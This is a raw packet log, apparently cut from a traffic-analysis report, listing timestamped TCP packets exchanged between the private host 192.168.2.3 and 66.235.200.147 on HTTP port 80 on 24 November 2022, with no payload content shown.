Nov 24, 2022 12:20:03.583463907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583472013 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583487988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583494902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583515882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583539009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583544016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583565950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583589077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583614111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583637953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583662033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583678961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583678961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583684921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583709002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583734035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583749056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583749056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583754063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583776951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583795071 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583801031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583825111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583830118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583848953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583873034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583895922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583895922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583923101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583944082 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.583946943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583971024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.583983898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584001064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584028006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584028959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584053993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584076881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584101915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584115028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584125042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584142923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584150076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584173918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584199905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584225893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584225893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584225893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584249973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584275007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584291935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584297895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584320068 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584321976 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584346056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584369898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584387064 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584389925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584414959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584418058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584439039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584466934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584485054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584502935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584522963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584546089 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584547043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584569931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584584951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584594965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584604979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584619999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584641933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584652901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584666014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584691048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584707975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584714890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584738016 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584759951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584762096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584785938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584804058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584810019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584822893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584832907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584857941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584882975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584884882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584908009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584930897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.584933043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584955931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584980965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.584986925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585010052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585033894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585038900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585057974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585081100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585103989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585129023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585134029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585134029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585134029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585153103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585176945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585201025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585225105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585227966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585247993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585257053 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585278034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585289001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585303068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585325956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585335970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585351944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585375071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585398912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585413933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585422039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585447073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585462093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585479975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585489988 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585514069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585532904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585550070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585576057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585599899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585623980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585628986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585648060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585656881 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585676908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585701942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585705996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585728884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585760117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585761070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585788965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585798025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585820913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585833073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585864067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585886955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585894108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585908890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585933924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585958004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.585961103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.585983038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586007118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586023092 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586033106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586050987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586057901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586081028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586093903 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586113930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586131096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586146116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586179972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586213112 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586247921 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586251974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586263895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586287975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586318970 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586342096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586354971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586365938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586390018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586402893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586415052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586438894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586448908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586463928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586488962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586514950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586528063 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586539984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586558104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586565971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586591005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586615086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586616039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586641073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586649895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586667061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586693048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586699963 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586715937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586750031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586752892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586783886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586808920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586821079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586855888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586924076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.586960077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.586999893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587037086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587069988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587101936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.587109089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587132931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.587141037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587172031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587205887 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.587208033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587238073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.587244034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587282896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587321997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587347031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.587349892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587383032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587419033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587419987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.587441921 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.587455988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587505102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587531090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587557077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587568045 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.587594986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587604046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.587631941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587671041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587707996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587745905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587781906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587819099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587856054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587894917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587929964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.587966919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588001013 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588037014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588074923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588105917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588109970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.588135958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588145018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.588165045 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.588167906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588205099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588218927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.588241100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588275909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588318110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588354111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588387966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588423014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588459015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588490963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588521957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588561058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588597059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588633060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588669062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588707924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588742971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588752031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.588783026 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588784933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.588808060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.588819981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588856936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588882923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588907003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588943005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.588979006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589015007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589051962 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589082956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589112043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589147091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589152098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.589181900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589200020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.589219093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589246988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589281082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589314938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589351892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589387894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589422941 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589458942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589495897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589533091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589569092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589605093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589607000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.589641094 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589652061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.589674950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589711905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589750051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589785099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589822054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589854956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589891911 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589929104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589965105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.589991093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590017080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590050936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590078115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590095997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590121984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590131044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590167999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590200901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590229034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590255022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590277910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590289116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590292931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590322018 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590323925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590339899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590361118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590363026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590398073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590432882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590445042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590470076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590486050 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590507030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590518951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590542078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590579987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590615034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590616941 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.590651035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.590656996 CET	49710	80	192.168.2.3	66.235.200.147
